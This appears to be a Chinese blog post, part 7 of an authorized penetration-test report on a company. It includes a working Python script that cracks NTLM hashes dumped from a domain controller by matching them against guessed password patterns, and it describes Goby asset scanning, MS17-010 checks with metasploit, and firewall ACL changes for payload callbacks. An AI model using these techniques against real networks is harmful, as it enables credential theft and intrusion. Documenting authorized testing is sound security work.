主页 > 网络知识 > 某企业授权渗透报告(7)

某企业授权渗透报告(7)

把上面两块代码进行融合:

import hashlib,binascii def NTLM_Hash(password): f = open('NTLM_Hash_Password.txt','a+',encoding="utf-8") hash = hashlib.new('md4', password.encode('utf-16le')).digest() NTLM_Hash_Password = str(str(binascii.hexlify(hash)).replace("b'", '').replace("'", '')) print("{}———————{}".format(password,NTLM_Hash_Password)) f.write("{}———————{} ".format(password,NTLM_Hash_Password)) def For_Password(name,kang): for i in range(1,254): password = str("{}{}{}{}".format(name,kang,name,i)) NTLM_Hash(password) print("[+] 完成") if __name__ == '__main__': For_Password(name="google", kang="@")

然后提取pass.txt的密文与刚刚明文加密后的密文进行一一比对

with open('pass.txt','r+',encoding="utf-8") as f: # 读取 CS 上导出N用户TLM密文信息 pass_data = f.read().splitlines() print("共计:{}".format(len(pass_data))) with open("NTLM_Hash_Password.txt","r+",encoding="utf-8") as f1 : # 读取 本地穷举的用户NTLM密文信息 ntlm_pass_data = f1.read().splitlines() print("共计:{}".format(len(ntlm_pass_data))) # 两个数列做比对 for i in pass_data: # 枚举 CS 上导出N用户TLM密文信息 for i2 in ntlm_pass_data: # 枚举 本地穷举的用户NTLM密文信息 if i in i2: # 如果 CS 上导出N用户TLM密文信息 被包含于 本地穷举的用户NTLM密文信息 则打印本地NTLM信息 print(i2)

执行上面这段脚本之后,脚本会枚举对比本地生成加密的NTLM密文信息与目标域控机器CS上面拖来的用户NTLM信息进行匹配,拿到明文密码;

 

某企业授权渗透报告

 

如果运气不好枚举不出密码,那就用HashCat尝试跑哈希密码吧。密码拿到之后可以尝试超级弱口令检查工具去进一步批量检测内网主机口令。

内网资产探测

推荐工具使用Goby 下载安装打开之后。点击设置代理,然后扫描。

 

某企业授权渗透报告

 

 

某企业授权渗透报告

某企业授权渗透报告

某企业授权渗透报告

 

通过上面扫描报告可以大致了解该网段的资产信息情况和网络拓补图结构,可以开始尝试控制相应的网络设备。

某网关防火墙AC:

 

某企业授权渗透报告

 

内网打印机服务器:

某企业授权渗透报告

内网邮件服务器:

某企业授权渗透报告

通讯录服务器:

某企业授权渗透报告

某主机设备管理系统:

 

某企业授权渗透报告

发现某办公区IP段里面有很多Windows 7操作系统的主机,尝试用metasploit检测一波MS17_010

 

 

某企业授权渗透报告

如果要让办公区电脑穿透内网上线的话,需要在外部防火墙网关那边设置一条放行的ACL规则,ACL规则(访问控制列表)放行源地址为办公区的IP地址通配符,目的地址为payload的监听上线地址即可。这里朋友那边没有给我授权,我就不做演示了。

 

说点什么吧
  • 全部评论(0
    还没有评论,快来抢沙发吧!